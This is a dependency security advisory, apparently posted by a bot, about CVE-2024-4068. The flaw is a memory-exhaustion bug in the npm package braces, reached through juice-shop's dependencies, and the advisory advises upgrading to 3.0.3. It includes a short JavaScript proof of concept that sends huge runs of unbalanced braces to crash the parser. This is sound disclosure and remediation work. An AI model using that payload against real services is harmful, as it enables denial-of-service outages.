High severity - Uncontrolled resource consumption vulnerability in braces (package.json)

[github-actions[bot]]

• Package Manager: npm
• Vulnerable module: braces
• Introduced through: juice-shop@12.3.0, check-dependencies@1.1.0 and others

  Detailed paths

• Introduced through: juice-shop@12.3.0 › check-dependencies@1.1.0 › findup-sync@2.0.0 › micromatch@3.1.10 › braces@2.3.2
• Introduced through: juice-shop@12.3.0 › grunt@1.4.1 › grunt-cli@1.4.3 › liftup@3.0.1 › findup-sync@4.0.0 › micromatch@4.0.4 › braces@3.0.2

  Overview

  braces is a Bash-like brace expansion, implemented in JavaScript.

Affected versions of this package are vulnerable to Uncontrolled resource consumption due improper limitation of the number of characters it can handle, through the parse function. An attacker can cause the application to allocate excessive memory and potentially crash by sending imbalanced braces as input.

PoC

const { braces } = require('micromatch');

console.log("Executing payloads...");

const maxRepeats = 10;

for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
  const payload = '{'.repeat(repeats*90000);

  console.log(`Testing with ${repeats} repeats...`);
  const startTime = Date.now();
  braces(payload);
  const endTime = Date.now();
  const executionTime = endTime - startTime;
  console.log(`Regex executed in ${executionTime / 1000}s.\n`);
} 

Remediation

Upgrade braces to version 3.0.3 or higher.

References

• GitHub Commit
• GitHub Issue
• GitHub PR
• Vulnerable Code
  SNYK-JS-BRACES-6838727
  (CVE-2024-4068) braces@2.3.2